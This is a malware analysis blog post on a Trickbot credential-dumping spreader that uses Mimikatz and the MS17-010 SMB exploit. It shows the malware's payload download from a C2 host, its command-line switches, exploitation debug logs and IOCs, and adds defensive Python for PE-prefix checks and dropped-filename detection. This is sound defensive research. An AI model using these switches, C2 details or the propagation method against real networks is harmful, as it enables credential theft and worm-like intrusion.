Sunday, February 25, 2018

A new spreader with Mimikatz & EternalBlue by Trickbot gang


It's been a long time since my last post here. Too busy with everything. However, now I had a chance to write something quickly!

About two weeks ago, Trickbot dropped something interesting. The file name was "spreader.bin". This wasn't from the latest email campaign or anything, but from a monitored instance. The spreader file was downloaded from one of the C2 servers of Trickbot.

I got my tools open and realized that the file is a 64-bit executable. For some reason it was dropped into a 32-bit Trickbot environment.

The first run revealed that it dumps credentials from Windows:

Image 1. The first run.
In the background an unknown file was requested, and then the spreader process terminated:

GET http://kishi73.com.br/table.png
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: kishi73.com.br

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
  <title>404 Not Found</title>
</head>
<body>
  <h1>Not Found</h1>
  <p>The requested URL /table.png was not found on this server.</p>
  <hr>
  <address>Apache Server at kishi73.com.br Port 80</address>
</body>
</html>


Unfortunately the file was no longer available. As you can see from image 1, a module called "PwDumper.dll" was loaded. Yes, it's Mimikatz, and it was used to dump the credentials. The module is written to the directory the spreader is executed from and deleted before the spreader process terminates.

Judging by the amount of information the spreader prints, I believe it is still in development. The executable also accepts a number of command-line switches:

--url
--user
--password
--domain
--console
--log

For example, you can set the URL from which the file (table.png) is downloaded. With the "--console" switch, debug strings are printed to the console:

thread 2984 Using:
thread 2984     user="test"
thread 2984     user="testpassword"
thread 2984 load  http://kishi73.com.br/table.png
thread 2984 domain: kishi73.com.br , resource: table.png
thread 2984 Bad the loading file prefix: 3c21444f
thread 2984 loaded: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>

<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /table.png was not found on this server.</p>
<hr>
<address>Apache Server at kishi73.com.br Port 80</address>
</body></html>

thread 2984 domain: kishi73.com.br , resource: table.png
thread 2984 WinHttpSendRequest A security error occurred
 (0x00002f8f)


I wasn't able to get my hands on the "table.png" file anymore. The debug line "Bad the loading file prefix: 3c21444f" shows why the first run terminated: 0x3c21444f is the first four bytes of the 404 page ("<!DO"), not an executable header. In a debugger we can see that the spreader process expects an executable file:

Image 2. Debugged code.
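
The prefix check the debug line implies, as an added example for the defender's side (this is not the spreader's code, and the exact header test the spreader performs is an assumption; what the post shows is only that it logs the first four bytes and wants an executable). The function reproduces the logged prefix for the 404 page and flags a download whose URL claims an image but whose body is a PE file, which is exactly what the spreader expects to find under the name table.png. The PE stub and the HTML sample are constructed inline.

```python
import struct

# Constructed sample: the start of the 404 page the spreader actually received.
HTML_404 = b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>'


def build_fake_pe() -> bytes:
    """Constructed sample: just enough header bytes to pass a PE check.
    Assumption: not a real payload, only "MZ" at 0, e_lfanew at 0x3c and "PE\\0\\0" there."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> PE signature at offset 0x40
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


def prefix_hex(data: bytes) -> str:
    """First four bytes as lowercase hex, the way the spreader logs them."""
    return data[:4].hex()


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a PE signature at e_lfanew (offset 0x3c)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_download(url: str, data: bytes) -> str:
    """Classify a fetched body; an image URL that serves a PE is the loader pattern."""
    is_pe = looks_like_pe(data)
    if url.lower().endswith((".png", ".jpg", ".gif")) and is_pe:
        return "suspicious: image URL serves a PE"
    if is_pe:
        return "pe"
    return "not-pe (prefix %s)" % prefix_hex(data)


if __name__ == "__main__":
    print(prefix_hex(HTML_404))
    print(classify_download("http://kishi73.com.br/table.png", HTML_404))
    print(classify_download("http://kishi73.com.br/table.png", build_fake_pe()))
```

The same check applies to proxy or sandbox output: a request with the User-Agent "WinHTTP loader/1.0" for an image-named resource whose body starts with "MZ" is worth an alert on its own.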


Thanks to the "--url" switch, it was easy to point the spreader at a file of my choosing. That file is the actual payload, which is pushed to the exploited machines. I used a non-malicious executable (PEiD) for testing. This time the spreader process was not terminated; instead it started to scan the network range where my workstation resides:

Image 3. Network scan.
The spreader tried to establish an initial SMB connection to every reachable machine using the dumped credentials. Where the credentials worked, it proceeded to exploit MS17-010 (EternalBlue). Note that the tool's own debug output refers to "Eternal romance"; EternalRomance is another of the SMBv1 exploits fixed by MS17-010, so the relevant patch is the same either way.

I started two Windows 7 machines (x64 and x86) and created the same account as seen in image 1. Both machines were unpatched. The exploitation process wasn't very stable, but in the end both machines were exploited successfully, including the machine where the spreader was run. Here is the debug log from the tool when a remote Windows 7 x64 machine was exploited:

C:\Users\Nicholas\Desktop>spreader.exe --console --url="http://x.x.x.x/PEiD.exe" | findstr 10.0.10.12\"

thread 308 checking address "10.0.10.12"
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system ""
thread 308 HOST 10.0.10.12, using named pipe: samr
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system ""
thread 308 Eternal romance object ("10.0.10.12") 9.
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "A:", native file system "NTFS"
thread 308 the file C:\WINDOWS\44783m8uh77g8l8_nkubyhu5vfxxbh878xo6hlttkppzf28tsdu5kwppk_11c1jl.exe on host 10.0.10.12 is created
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "A:", native file system "NTFS"
thread 308 the file C:\WINDOWS\lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb.exe on host 10.0.10.12 is created
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system ""
thread 308 Service(10.0.10.12:lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb started.
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system ""

After a successful exploit, the payload was running on the target machine. The dropped file was also added to startup for persistence.

Generated file names were always 64 characters long, drawn from the character set "0123456789_qwertyuiopasdfghjklzxcvbnm".
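
An added example (not code from the post or from the spreader) that turns the debug log above and the naming scheme into something a responder can run: it parses the "--console" lines per host, checks dropped file names against the 64-character charset, and reports which dropped files were also started as a service of the same name. The regular expressions are written against the exact line formats shown above and are an assumption for any other output; the sample log is constructed from the post's lines plus one benign file name for contrast.

```python
import re
from collections import defaultdict

CHARSET = "0123456789_qwertyuiopasdfghjklzxcvbnm"
# Assumption: exactly 64 characters from CHARSET, as observed for every dropped file.
NAME_RE = re.compile(r"^[" + re.escape(CHARSET) + r"]{64}$")

# Patterns for the three debug lines of interest (formats as shown in the post).
EXPLOIT_RE = re.compile(r'Eternal romance object \("(?P<host>[\d.]+)"\)')
CREATED_RE = re.compile(r"the file (?P<path>\S+) on host (?P<host>[\d.]+) is created")
SERVICE_RE = re.compile(r"Service\((?P<host>[\d.]+):(?P<name>\S+) started")


def is_spreader_name(filename: str) -> bool:
    """True for <64 charset chars>.exe, the naming scheme of the dropped files."""
    stem, dot, ext = filename.rpartition(".")
    return dot == "." and ext.lower() == "exe" and bool(NAME_RE.match(stem))


def parse_spreader_log(lines):
    """Per host: whether exploitation was logged, files created, services started."""
    hosts = defaultdict(lambda: {"exploited": False, "files": [], "services": []})
    for line in lines:
        m = EXPLOIT_RE.search(line)
        if m:
            hosts[m["host"]]["exploited"] = True
            continue
        m = CREATED_RE.search(line)
        if m:
            hosts[m["host"]]["files"].append(m["path"])
            continue
        m = SERVICE_RE.search(line)
        if m:
            hosts[m["host"]]["services"].append(m["name"])
    return dict(hosts)


def check_dropped_files(hosts):
    """Per host: dropped basenames matching the scheme, and which of those were
    started as a service of the same name (the chain visible in the log)."""
    out = {}
    for host, info in hosts.items():
        basenames = [p.rsplit("\\", 1)[-1] for p in info["files"]]
        matching = [f for f in basenames if is_spreader_name(f)]
        started = [f for f in matching if f[:-4] in info["services"]]
        out[host] = {"matching": matching, "service_started": started}
    return out


# Constructed sample: lines from the post plus a benign file name that must not match.
SAMPLE_LOG = """\
thread 308 checking address "10.0.10.12"
thread 308 Eternal romance object ("10.0.10.12") 9.
thread 308 the file C:\\WINDOWS\\44783m8uh77g8l8_nkubyhu5vfxxbh878xo6hlttkppzf28tsdu5kwppk_11c1jl.exe on host 10.0.10.12 is created
thread 308 the file C:\\WINDOWS\\lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb.exe on host 10.0.10.12 is created
thread 308 the file C:\\WINDOWS\\notepad.exe on host 10.0.10.12 is created
thread 308 Service(10.0.10.12:lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb started.
""".splitlines()


if __name__ == "__main__":
    parsed = parse_spreader_log(SAMPLE_LOG)
    for host, result in check_dropped_files(parsed).items():
        print(host, "exploited" if parsed[host]["exploited"] else "not exploited", result)
```

On an endpoint the same name check can be applied to files created under C:\Windows and to newly registered service names: a 64-character lowercase/digit/underscore name is not something a legitimate installer produces.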

Trickbot already has some worm capabilities, but nothing like this, as far as I know. Immediately dumping credentials from patient zero and then using them to attack the local network with an MS17-010 exploit can lead to multiple infected machines very quickly. Right now the payload can be chosen freely, so the spreader could be used to spread any payload. Patching MS17-010 (and disabling SMBv1) removes the exploitation step; the credential dump still matters, because the spreader uses those credentials for its initial SMB connections.

IOCs:

Network:

hxxp://kishi73[.]com.br/table.png
194.87.98[.]146/spreader.bin

Files:

spreader.bin
b1cccf65c89d2df401b9ed2ebefec815eb9cf330e459a5dbffd629089444642f (analyzed)
dd69cc0dd8d82a1686222c54ee24b17ed813e8f9b7b42edaa5efdf50c7792ddf

PwDumper.dll
5eb9f59fb32c3eb9f7ddcd470f87caa2a1e0a17d19453ccc857e980f6fff233a

Debug strings:

d:\myprojects\spreader\x64\release\spreader.pdb